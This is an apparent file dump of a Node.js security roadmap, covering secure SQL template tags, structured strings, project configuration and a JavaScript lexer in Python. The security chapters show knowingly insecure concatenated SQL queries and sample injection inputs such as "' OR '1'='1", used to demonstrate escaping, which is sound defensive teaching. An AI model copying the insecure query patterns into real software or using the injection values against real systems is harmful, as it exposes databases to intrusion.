    SELECT ${outputColumnsAndJoins(a, b, c)}
    WHERE  ${rowFilter(x, y, z)}
`(callback)

// Returns a SqlFragment
function rowFilter(x, y, z) {
  if (complexCondition) {
    // mysql.sql returns a SqlFragment
    return mysql.sql`X = ${x}`;
  } else {
    return mysql.sql`Y = ${y} AND Z=${z}`;
  }
}

function outputColumnsAndJoins(a, b, c) {
  return mysql.sql`...`;
}
```
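Composition works because the tag's output is itself a typed value that later tag calls recognize. A minimal sketch, assuming MySQL's default backslash escaping: the hypothetical `Fragment` class stands in for `SqlFragment`, `frag` is a toy tag that is not context-aware, and `rowFilter` takes an explicit `useX` flag in place of the undefined `complexCondition` above:

```js
// Hypothetical wrapper marking text as already-safe SQL tokens.
class Fragment {
  constructor (text) { this.text = String(text) }
  toString () { return this.text }
}

function escapeValue (value) {
  if (value instanceof Fragment) return value.text // trusted: no re-escaping
  if (typeof value === 'number' && Number.isFinite(value)) return String(value)
  if (value === null || value === undefined) return 'NULL'
  return "'" + String(value).replace(/[\\']/g, (c) => '\\' + c) + "'"
}

// Toy tag: escapes ordinary values, splices Fragments verbatim, and
// returns a Fragment so that results compose.
function frag (strings, ...values) {
  let out = strings[0]
  for (let i = 0; i < values.length; ++i) {
    out += escapeValue(values[i]) + strings[i + 1]
  }
  return new Fragment(out)
}

function rowFilter (x, y, z, useX) {
  return useX ? frag`X = ${x}` : frag`Y = ${y} AND Z = ${z}`
}

const query = frag`SELECT * FROM T WHERE ${rowFilter(1, "it's", 3, false)}`
console.log(String(query))
// SELECT * FROM T WHERE Y = 'it\'s' AND Z = 3
```

A plain string that merely looks like SQL, such as `'1 = 1'`, is still quoted; only `Fragment` instances pass through unescaped.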

----

Our goal was to make the easiest way to express an idea a secure way.

As the comparison below shows, this template tag API is the shortest
way to express this idea.  It is also tolerant of small variations:
the author may leave out quotes since the tag implementation
knows whether a substitution is inside quotes.

Shorter & tolerant != easier, but we hope that being shorter, more
robust, more secure, and easier to compose will make it a good migration
target for teams that realize they have a problem with SQL injection.
We also hope these factors will cause developers who have been through
such a migration to continue to use it in subsequent projects, where it
may spread to other developers.


```js
// Proposed: Secure, tolerant, composes well.
connection.query`SELECT * FROM T WHERE x=${x}`(callback)
connection.query`SELECT * FROM T WHERE x="${x}"`(callback)

// String concatenation.  Insecure, composes well.
connection.query('SELECT * FROM T WHERE x = "' + x + '"', callback)
connection.query(`SELECT * FROM T WHERE x = "${x}"`, callback)

// String concatenation is not tolerant.
// Broken in a way that will be caught during casual testing.
connection.query('SELECT * FROM T WHERE x = ' + x, callback)
connection.query(`SELECT * FROM T WHERE x = ${x}`, callback)

// Prepared Statements.  Secure, composes badly, positional parameters.
connection.query('SELECT * FROM T WHERE x = ?', x, callback)
connection.query('SELECT * FROM T WHERE x = "?"', x, callback)  // Subtly broken
```


[`mysql`]: https://www.npmjs.com/package/mysql
[QUI]: ../chapter-1/threat-QUI.md
[prepared statements]: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet#Defense_Option_1:_Prepared_Statements_.28with_Parameterized_Queries.29
[tagged template literal]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals#Tagged_template_literals
[sql-code]: https://github.com/google/node-sec-roadmap/tree/master/chapter-7/examples/sql
[mysql-PR]: https://github.com/mysqljs/mysql/pull/1926


================================================
FILE: chapter-7/structured-strings.md
================================================
# Structured Strings

Both of the previously discussed problems, query injection and shell
injection, are facets of a common problem: it is hard to securely
compose strings to send outside the process.  In the first case,
we send a query string to a database via a file descriptor bound to a
network socket or an IPC endpoint.  In the second, we send a string
via a syscall wrapper to spawn a child process.

## Success Criteria

We can securely compose strings for external endpoints if:

*  Developers routinely use tools to produce structured strings
   that preserve developers' intent even in the face of inputs
   crafted by a skilled attacker, and/or
*  Where developers do not, the backends grant no authority based on
   the structure of the string, and the authority granted ambiently is
   so small as to not be abusable.

Nailing down the definition of *intent* is hard, but here is how we
might do it in one context.  Consider

```js
"SELECT * FROM T WHERE id=" + f(accountNumber)
```

A reasonable reader would conclude that the author intended:

*  That the result specifies one statement, a select statement.
*  That `f(accountNumber)` specifies only a simple value that
   can be compared to values in the *id* column.

Given that, we can say `function f(x)` preserves intent in that code
if, for any value of `accountNumber`, it throws an exception or
its output following "`SELECT * FROM T WHERE id=`" parses as a
single number or string literal token.
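One way to satisfy that definition for this particular context is sketched below, assuming MySQL's default (backslash-escaping) string syntax. It accepts only non-negative safe integers, which print as a single numeric token, and strings, which become a single quoted literal, and it throws for everything else. The name `f` mirrors the text; the rules are illustrative, not exhaustive:

```js
// Hypothetical encoder for the `id=` position: returns exactly one
// literal token or throws.
function f (accountNumber) {
  if (typeof accountNumber === 'number' &&
      Number.isSafeInteger(accountNumber) && accountNumber >= 0) {
    // A non-negative integer prints as one numeric token. (A negative one
    // would print as "-" followed by a number: two tokens.)
    return String(accountNumber)
  }
  if (typeof accountNumber === 'string') {
    // One single-quoted literal: escape the only characters that could
    // end it early, assuming backslash escapes are enabled.
    return "'" + accountNumber.replace(/[\\']/g, (c) => '\\' + c) + "'"
  }
  throw new TypeError('cannot encode as a single literal token')
}

console.log('SELECT * FROM T WHERE id=' + f(12345))
// SELECT * FROM T WHERE id=12345
console.log('SELECT * FROM T WHERE id=' + f('0 OR 1=1'))
// SELECT * FROM T WHERE id='0 OR 1=1'
```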


## A possible solution

### Change the world so we can give simple answers to hard questions.

Extend existing APIs so that whenever a developer is composing a
string to send outside the `node` process, they have a template
literal tag based API that is more secure than string concatenation.

Then, we can give developers a simple piece of advice:

> If you're composing a string that will end up outside node, use
> a template tag.

Template tags will have implementation bugs, but fixing one template
tag is easier than fixing many expressions of the form
`("foo " + bar + " baz")`.


### A common style guide for tag implementers.

It would help developers if these template literal tags had some
consistency across libraries.  We've already briefly discussed ways to
make template tags more discoverable and usable when talking about
ways to treat [generated code][synthetic modules] as first class.

We propose a style guide for tag authors.
Others will probably have better ideas as to what it should contain, but
to get a discussion started:

-  Functions that compose or represent a string whose recipient is outside
   the node runtime should be usable as template tags.
   One example is `mysql.format`, which composes a string of SQL.
-  These functions should return a typed string wrapper.
   For example, if the output is a string of *SQL* tokens,
   then return an instance of:
   ```js
   function SqlFragment(s) {
     if (!(this instanceof SqlFragment)) { return new SqlFragment(s); }
     this.content = String(s);
   }
   // A regular function, not an arrow: arrows do not bind `this`.
   SqlFragment.prototype.toString = function () { return this.content; };
   ```
   When a `SqlFragment` arrives as an interpolation value in a position
   where a fragment of SQL makes sense, don't re-escape it.
-  See if you can reuse string wrappers from a library before rolling
   your own to encourage interoperability.
   If a library defines a type representing a fragment of HTML, use that
   as long as your tag can uphold the type's contract.
   For example if the type has a particular [security contract][],
   make sure that you preserve that security contract.
   You may assume that wrapped strings come from a source that upheld
   the contract.
   Producing a value that doesn't uphold its contract when your inputs do
   is a bug, but assuming incorrectly that type contracts hold for your
   inputs is not.
   If you can double check inputs, great!
-  The canonical way to test whether a function was (very probably)
   called as a template tag is
   ```js
   function myTag(a, ...b) {  // `myTag` is a placeholder name
     if (Array.isArray(a) && Array.isArray(a.raw)
         && Object.isFrozen(a)
         && a.length === b.length + 1) {
       // Treat as template tag.
     } else {
       // Handle non template tag use.
     }
   }
   ```
-  When a template tag takes options objects, it should
   be possible to curry those before invoking the function as a tag.
   The following passes some environment variables and a working directory
   before the command:
   ```js
   shelljs.exec({ env: ..., cwd: ... })`cat ...`
   ```
-  When a template tag takes a `callback`, the template tag should
   return a function that will receive the callback.
   The following uses a template tag that returns a function that
   takes a callback:
   ```js
   myConnection.query`SELECT ...`(callback)
   ```
-  Where possible, allow indenting multi-line template tags.
   Use the first line with non-whitespace characters as a cue
   when stripping whitespace from the rest of the lines.
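Several of these conventions can be combined in one tag. The sketch below is hypothetical throughout: `makeTag`, `run`, and `exec` are invented names, and `JSON.stringify` is only a placeholder for a real, context-aware escaper. It uses the detection check from the style guide to decide whether it was called as a tag or with an options object to curry, and when called as a tag it returns a function that receives the callback:

```js
// The detection check from the style guide.
function isTemplateTagCall (a, rest) {
  return Array.isArray(a) && Array.isArray(a.raw) &&
    Object.isFrozen(a) && a.length === rest.length + 1
}

// Hypothetical tag factory. `run` stands in for whatever sends the
// composed string outside the process.
function makeTag (run, options = {}) {
  return function tag (first, ...rest) {
    if (isTemplateTagCall(first, rest)) {
      // Placeholder composition: JSON.stringify is NOT a real escaper
      // for shells or SQL; a real tag would escape for the context.
      let text = first[0]
      for (let i = 0; i < rest.length; ++i) {
        text += JSON.stringify(rest[i]) + first[i + 1]
      }
      // Return a function that receives the callback.
      return (callback) => run(text, options, callback)
    }
    // Not a tag call: treat the argument as options and curry them.
    return makeTag(run, Object.assign({}, options, first))
  }
}

const calls = []
const exec = makeTag((text, options, callback) => {
  calls.push({ text, options })
  callback(null, text)
})

// Options first, then the template, then the callback.
exec({ cwd: '/tmp' })`echo ${'hi'}`((err, text) => {
  console.log(err, text) // null echo "hi"
})
// No options: used directly as a tag.
exec`ls`((err) => { if (err) throw err })
```

Because currying returns a fresh tag, one configured tag can be reused for many calls without the options leaking into other call sites.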

## Alternatives

Database abstractions like object-relational mappings are a great way
to get developers out of the messy business of composing queries.

There are still niche use cases like ad-hoc reporting that require
composing queries, and solving the problem for database queries does
not solve it for strings sent elsewhere, e.g. shells.

Builder APIs provide a flexible way to compose structured content.
For example,

```java
  new QueryBuilder()
  .select()
  .innerJoin(...).on(...)
  .columns(...)
  .where(...)
  .orderBy(...)
  .build()
```

The explicit method calls specify the structure of the resulting
string, so controlling parameters doesn't grant control of sentence
structure, and control of one parameter doesn't allow reinterpreting
part of the query specified by an uncontrolled parameter.
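For comparison with the Java-style chain above, here is a minimal JavaScript builder sketch. `ToyQueryBuilder` is hypothetical and supports only equality conditions. It shows how structure comes from which methods are called, while parameter values only ever become quoted literals (assuming MySQL's default backslash escaping):

```js
// Hypothetical builder: only equality conditions, MySQL default escaping.
const IDENTIFIER = /^[A-Za-z_][A-Za-z0-9_]*$/

function quote (value) {
  return "'" + String(value).replace(/[\\']/g, (c) => '\\' + c) + "'"
}

class ToyQueryBuilder {
  constructor () {
    this.table = null
    this.conditions = []
  }

  from (table) {
    // Names are checked against a conservative pattern, never escaped.
    if (!IDENTIFIER.test(table)) throw new Error('bad table name')
    this.table = table
    return this
  }

  whereEquals (column, value) {
    if (!IDENTIFIER.test(column)) throw new Error('bad column name')
    this.conditions.push({ column, value })
    return this
  }

  build () {
    let sql = 'SELECT * FROM ' + this.table
    if (this.conditions.length) {
      sql += ' WHERE ' + this.conditions
        .map(({ column, value }) => column + ' = ' + quote(value))
        .join(' AND ')
    }
    return sql
  }
}

const built = new ToyQueryBuilder()
  .from('T')
  .whereEquals('x', "' OR '1'='1")
  .build()
console.log(built)
// SELECT * FROM T WHERE x = '\' OR \'1\'=\'1'
```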

In JavaScript we prefer tagged templates to builders.  Builder APIs can
be syntactically heavy, and developers have to discover and learn them.
We hope that adoption of template tags will be easier because:

*  Tagged templates are syntactically lighter, so they are easier to write.
*  Someone unfamiliar with the API but familiar with the query language
   can lean on their knowledge of the query language to understand a
   tagged template, which makes tagged templates easier to read and to
   adapt for one's own work.
*  Builder APIs have to treat nested sub-languages (e.g. URLs in HTML)
   as strings unless there is a builder API for the sub-language.


[security contract]: https://github.com/google/safe-html-types
[synthetic modules]: ../chapter-2/synthetic-modules.html


================================================
FILE: cover.md
================================================
# A Roadmap for Node.js Security

Node.js has a vibrant community of application developers and library
authors built around a mature and well-maintained core runtime and
library set.  Its growing popularity is already drawing more attention
from attackers.  This roadmap discusses how some Node.js projects
address security challenges, along with ways to make it easier
for more projects to address these challenges in a thorough and
consistent manner.

This is not the opinion of any organization.  It is the considered
opinion of
[some computer security professionals and Node.js enthusiasts][contributors]
who have worked to make it easier to write secure, robust software on
other platforms; who like a lot about Node.js; and who would like to
help make it better.

Our intended audience is Node.js library and infrastructure
maintainers who want to stay ahead of the increased scrutiny that
Node.js is getting from attackers.  We have not researched whether,
and do not assert that, any stack is inherently more or less secure
than any other.

Node.js security is especially important for "primary targets".
Targets are often subdivided into "primary targets" and "targets of
opportunity."  Attackers go after targets of opportunity when they
happen to spot a vulnerability; they go out of their way to find
vulnerabilities in primary targets.  The practices which prevent one
from becoming a target of opportunity might not be enough if one is a
primary target of an actor with resources at their disposal.  We hope
that the ideas we present might help primary targets to defeat attacks
while making targets of opportunity rarer and the entire ecosystem more
secure.

When addressing threats, we want to make sure we preserve Node.js's
strengths.

*  Development teams can iterate quickly, allowing them to explore a
   large portion of the design space.
*  Developers can use a wealth of publicly available packages to solve
   everyday problems.
*  Anyone who identifies a shared problem can write and publish a
   module to solve it, or send a pull request with a fix or extension
   to an existing project.
*  Node.js integrates with a wide variety of application containers so
   project teams have options when deciding how to deploy.
*  Using JavaScript on the front and back ends of Web applications
   allows developers to work both sides when need be.

The individual chapters are largely independent of one another:

"[Threat environment][]" discusses the kinds of threats that concern us.

"[Dynamism when you need it][]" discusses how to preserve the power of
CommonJS module linking, `vm` contexts, and runtime code generation
while making sure that, in production, only code that the development
team trusts gets run.

"[Knowing your dependencies][]" discusses ways to help development
teams make informed decisions about third-party dependencies.

"[Keeping your dependencies close][]" discusses how keeping a local
replica of portions of the larger npm repository affects security and
aids incident response.

"[Oversight][]" discusses how code-quality tools can help decouple
security review from development.

"[When all else fails][]" discusses how the development &rarr;
production pipeline and development practices can affect the ability
of security professionals to identify and respond to imminent threats.

"[Library support for safe coding practices][]" discusses idioms
that, if more widespread, might make it easier for developers to
produce secure, robust systems.

You can browse the supporting code via *[github.com/google/node-sec-roadmap/][]*.

[contributors]: CONTRIBUTORS.md
[Threat environment]: chapter-1/threats.md
[Dynamism when you need it]: chapter-2/dynamism.md
[Knowing your dependencies]: chapter-3/knowing_dependencies.md
[Keeping your dependencies close]: chapter-4/close_dependencies.md
[Oversight]: chapter-5/oversight.md
[When all else fails]: chapter-6/failing.md
[Library support for safe coding practices]: chapter-7/libraries.md
[github.com/google/node-sec-roadmap/]: https://github.com/google/node-sec-roadmap/


================================================
FILE: license.md
================================================
<!-- Markdown licensed under CC-BY-4.0
     Supporting code licensed under Apache License 2.0 -->

<!-- HTML courtesy https://creativecommons.org/ -->
<a rel="license" href="http://creativecommons.org/licenses/by/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by/4.0/88x31.png" /></a><br /><span xmlns:dct="http://purl.org/dc/terms/" href="http://purl.org/dc/dcmitype/Text" property="dct:title" rel="dct:type">A Roadmap for Node.js Security</span> by <a xmlns:cc="http://creativecommons.org/ns#" href="https://github.com/google/node-sec-roadmap/" property="cc:attributionName" rel="cc:attributionURL">https://github.com/google/node-sec-roadmap/</a> is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by/4.0/">Creative Commons Attribution 4.0 International License</a>.


================================================
FILE: package.json
================================================
{
  "version": "1.0.0",
  "name": "@mikesamuel/nodejs_sec_book",
  "description": "Booklet about NodeJS in organizations with large security profiles",
  "homepage": "https://github.com/google/node-sec-roadmap/",
  "license": "(Apache License 2.0 OR CC-BY-4.0)",
  "author": {
    "name": "Mike Samuel",
    "email": "mikesamuel@gmail.com",
    "url": "https://github.com/mikesamuel"
  },
  "files": [
    "www/**"
  ],
  "main": "www/index.html",
  "dependencies": {
    "gitbook": ">=3.2.3",
    "gitbook-cli": ">=2.3.2",
    "gitbook-plugin-ga": "^1.0.1",
    "gitbook-plugin-links": "^3.0.1",
    "svgexport": "^0.3.2"
  },
  "private": true,
  "scripts": {
    "start": "make serve"
  }
}


================================================
FILE: styles/website.css
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

.print-button.btn.links-link {
    display: inline-block;
    width: 30px;
    font-size: 0;
    background-image: url("/images/ic_print_24dp.svg");
    background-repeat: no-repeat;
    background-position: center center;
}

.github-button.btn.links-link {
    display: inline-block;
    width: 30px;
    font-size: 0;
    background-image: url("/images/GitHub-Mark-32px.png");
    background-repeat: no-repeat;
    background-position: center center;
    background-size: 20px;
    opacity: 0.25;
}

/* Style external links */
a[href^="http://"]:not([href^="http://www.gitbook.com"]),
a[href^="https://"]:not([href^="https://www.gitbook.com"]),
a[href^="//"]:not([href^="//www.gitbook.com"]) {
    background-image: url("/images/FileExternal.svg");
    background-position: center right;
    background-repeat: no-repeat;
    background-size: 12px 12px;
    padding-right: 14px;
}


================================================
FILE: third_party/__init__.py
================================================
# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


================================================
FILE: third_party/jslex/__init__.py
================================================
# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


================================================
FILE: third_party/jslex/jslex.py
================================================
# Copyright 2011-2015 Ned Batchelder.  All rights reserved.
#
# Except where noted otherwise, this software is licensed under the Apache
# License, Version 2.0 (the "License"); you may not use this work except in
# compliance with the License.  You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# From https://bitbucket.org/ned/jslex/raw/a1ee4078977a3ef9c4682837c669637c04c417af/jslex.py
# For details: https://bitbucket.org/ned/jslex/src/default/NOTICE.txt


"""JsLex: a lexer for Javascript"""

import re

class Tok(object):
    """A specification for a token class."""

    num = 0

    def __init__(self, name, regex, next=None):
        self.id = Tok.num
        Tok.num += 1
        self.name = name
        self.regex = regex
        self.next = next

def literals(choices, prefix="", suffix=""):
    """Create a regex from a space-separated list of literal `choices`.

    If provided, `prefix` and `suffix` will be attached to each choice
    individually.

    """
    return "|".join(prefix+re.escape(c)+suffix for c in choices.split())

class Lexer(object):
    """A generic multi-state regex-based lexer."""

    def __init__(self, states, first):
        self.regexes = {}
        self.toks = {}

        for state, rules in states.items():
            parts = []
            for tok in rules:
                groupid = "t%d" % tok.id
                self.toks[groupid] = tok
                parts.append("(?P<%s>%s)" % (groupid, tok.regex))
            self.regexes[state] = re.compile("|".join(parts), re.MULTILINE|re.VERBOSE)

        self.state = first

    def lex(self, text):
        """Lexically analyze `text`.

        Yields pairs (`name`, `tokentext`).

        """
        end = len(text)
        state = self.state
        regexes = self.regexes
        toks = self.toks
        start = 0

        while start < end:
            for match in regexes[state].finditer(text, start):
                name = match.lastgroup
                tok = toks[name]
                toktext = match.group(name)
                start += len(toktext)
                yield (tok.name, toktext)

                if tok.next:
                    state = tok.next
                    break

        self.state = state


class JsLexer(Lexer):
    """A Javascript lexer

    >>> lexer = JsLexer()
    >>> list(lexer.lex("a = 1"))
    [('id', 'a'), ('ws', ' '), ('punct', '='), ('ws', ' '), ('dnum', '1')]

    This doesn't properly handle non-ASCII characters in the Javascript source.

    """

    # Because these tokens are matched as alternatives in a regex, longer possibilities
    # must appear in the list before shorter ones, for example, '>>' before '>'.
    #
    # Note that we don't have to detect malformed Javascript, only properly lex
    # correct Javascript, so much of this is simplified.

    # Details of Javascript lexical structure are taken from
    # http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-262.pdf

    # A useful explanation of automatic semicolon insertion is at
    # http://inimino.org/~inimino/blog/javascript_semicolons

    both_before = [
        Tok("comment",      r"/\*(.|\n)*?\*/"),
        Tok("linecomment",  r"//.*?$"),
        Tok("ws",           r"\s+"),
        Tok("keyword",      literals("""
                                break case catch class const continue debugger
                                default delete do else enum export extends
                                finally for function if import in instanceof new
                                return super switch this throw try typeof var
                                void while with
                                """, suffix=r"\b"), next='reg'),
        Tok("reserved",     literals("null true false", suffix=r"\b"), next='div'),
        Tok("id",           r"""
                            ([a-zA-Z_$]|\\u[0-9a-fA-F]{4})          # first char
                            ([a-zA-Z_$0-9]|\\u[0-9a-fA-F]{4})*      # rest chars
                            """, next='div'),
        Tok("hnum",         r"0[xX][0-9a-fA-F]+", next='div'),
        Tok("onum",         r"0[0-7]+", next='div'),
        Tok("dnum",         r"""
                            (   (0|[1-9][0-9]*)         # DecimalIntegerLiteral
                                \.                      # dot
                                [0-9]*                  # DecimalDigits-opt
                                ([eE][-+]?[0-9]+)?      # ExponentPart-opt
                            |
                                \.                      # dot
                                [0-9]+                  # DecimalDigits
                                ([eE][-+]?[0-9]+)?      # ExponentPart-opt
                            |
                                (0|[1-9][0-9]*)         # DecimalIntegerLiteral
                                ([eE][-+]?[0-9]+)?      # ExponentPart-opt
                            )
                            """, next='div'),
        Tok("punct",        literals("""
                                >>>= === !== >>> <<= >>= <= >= == != << >> && 
                                || += -= *= %= &= |= ^=
                                """), next="reg"),
        Tok("punct",        literals("++ -- ) ]"), next='div'),
        Tok("punct",        literals("{ } ( [ . ; , < > + - * % & | ^ ! ~ ? : ="), next='reg'),
        Tok("string",       r'"([^"\\]|(\\(.|\n)))*?"', next='div'),
        Tok("string",       r"'([^'\\]|(\\(.|\n)))*?'", next='div'),
        ]

    both_after = [
        Tok("other",        r"."),
        ]

    states = {
        'div': # slash will mean division
            both_before + [
            Tok("punct", literals("/= /"), next='reg'),
            ] + both_after,

        'reg':  # slash will mean regex
            both_before + [
            Tok("regex",
                r"""
                    /                       # opening slash
                    # First character is..
                    (   [^*\\/[]            # anything but * \ / or [
                    |   \\.                 # or an escape sequence
                    |   \[                  # or a class, which has
                            (   [^\]\\]     #   anything but \ or ]
                            |   \\.         #   or an escape sequence
                            )*              #   many times
                        \]
                    )
                    # Following characters are same, except for excluding a star
                    (   [^\\/[]             # anything but \ / or [
                    |   \\.                 # or an escape sequence
                    |   \[                  # or a class, which has
                            (   [^\]\\]     #   anything but \ or ]
                            |   \\.         #   or an escape sequence
                            )*              #   many times
                        \]
                    )*                      # many times
                    /                       # closing slash
                    [a-zA-Z0-9]*            # trailing flags
                """, next='div'),
            ] + both_after,
        }

    def __init__(self):
        super(JsLexer, self).__init__(self.states, 'reg')


def js_to_c_for_gettext(js):
    """Convert the Javascript source `js` into something resembling C for xgettext.

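    What actually happens is that all the regex literals are replaced with
    "REGEX", single-quoted strings are rewritten as double-quoted strings,
    and the backslashes of Unicode escapes in identifiers are replaced
    with "U".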

    """
    def escape_quotes(m):
        """Replacement callback for re.sub: escape bare double quotes."""
        s = m.group(0)
        if s == '"':
            return r'\"'
        else:
            return s

    lexer = JsLexer()
    c = []
    for name, tok in lexer.lex(js):
        if name == 'regex':
            # C doesn't grok regexes, and they aren't needed for gettext,
            # so just output a string instead.
            tok = '"REGEX"'
        elif name == 'string':
            # C doesn't have single-quoted strings, so make all strings
            # double-quoted.
            if tok.startswith("'"):
                guts = re.sub(r"\\.|.", escape_quotes, tok[1:-1])
                tok = '"' + guts + '"'
        elif name == 'id':
            # C can't deal with Unicode escapes in identifiers.  We don't
            # need them for gettext anyway, so replace them with something
            # innocuous
            tok = tok.replace("\\", "U")
        c.append(tok)
    return ''.join(c)
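The central trick in `JsLexer` is that `/` is ambiguous in JavaScript: after an operand it means division, but after an operator (or at the start of input) it opens a regex literal. jslex resolves this by tracking a state: each `Tok` names the state to switch to (`next='div'` or `next='reg'`), and `Lexer.__init__` compiles each state's rules into one alternation of named groups (`t%d`) so that `match.lastgroup` identifies which token class matched. The following is a minimal, self-contained sketch of that technique under simplifying assumptions; it is not part of jslex, and the names `COMMON`, `FALLBACK`, `STATES`, `compile_states`, `lex` and `kinds` are hypothetical. It covers only identifiers, integers, a few punctuators and regex literals without `[...]` classes, and it omits keywords such as `return` (which jslex routes to the `'reg'` state), strings and comments.

```python
import re

# Rules shared by both states: (token name, regex, state to switch to).
# A next state of None means "stay in the current state".
# Order matters: Python's "|" takes the first alternative that matches,
# not the longest, so ">>=" must come before ">>", which precedes ">".
COMMON = [
    ("ws", r"\s+", None),
    ("id", r"[A-Za-z_$][A-Za-z0-9_$]*", "div"),  # operand: "/" next divides
    ("num", r"[0-9]+", "div"),
    ("punct", r"[)\]]", "div"),                  # ")" and "]" end operands
    ("punct", r">>=|>>|[=(\[;,+\-*>]", "reg"),   # operators expect an operand
]
# Any single character, so every position matches some rule.
FALLBACK = [("other", r"[\s\S]", None)]

STATES = {
    # After an operator (or at the start), "/" opens a regex literal.
    # Simplification: no "[...]" classes, so /[/]/ is not handled.
    "reg": COMMON + [("regex", r"/(?:[^/\\\n]|\\.)+/[A-Za-z]*", "div")],
    # After an operand, "/" and "/=" are division operators.
    "div": COMMON + [("punct", r"/=?", "reg")],
}


def compile_states(states):
    """Compile each state's rules into one alternation of named groups."""
    compiled = {}
    for state, rules in states.items():
        rules = rules + FALLBACK
        pattern = "|".join(
            "(?P<t%d>%s)" % (i, regex) for i, (_, regex, _) in enumerate(rules))
        compiled[state] = (re.compile(pattern), rules)
    return compiled


COMPILED = compile_states(STATES)


def lex(text, state="reg"):
    """Yield (name, token_text) pairs, switching state after each token."""
    pos = 0
    while pos < len(text):
        regex, rules = COMPILED[state]
        m = regex.match(text, pos)  # FALLBACK guarantees a non-empty match
        # Inner groups are non-capturing, so lastgroup is the rule's "tN".
        name, _, next_state = rules[int(m.lastgroup[1:])]
        yield name, m.group()
        pos = m.end()
        if next_state is not None:
            state = next_state


def kinds(text):
    """Tokens without whitespace, for easier inspection."""
    return [(name, tok) for name, tok in lex(text) if name != "ws"]
```

With this sketch, `kinds("a = b / c / d")` reports both slashes as `punct` tokens, while `kinds("x = /ab+c/g")` ends with `("regex", "/ab+c/g")`. Unlike `Lexer.lex`, which restarts `finditer` after every state change, the sketch anchors each step with `Pattern.match(text, pos)`; the catch-all fallback rule plays the same role as jslex's `other` token, so lexing always advances.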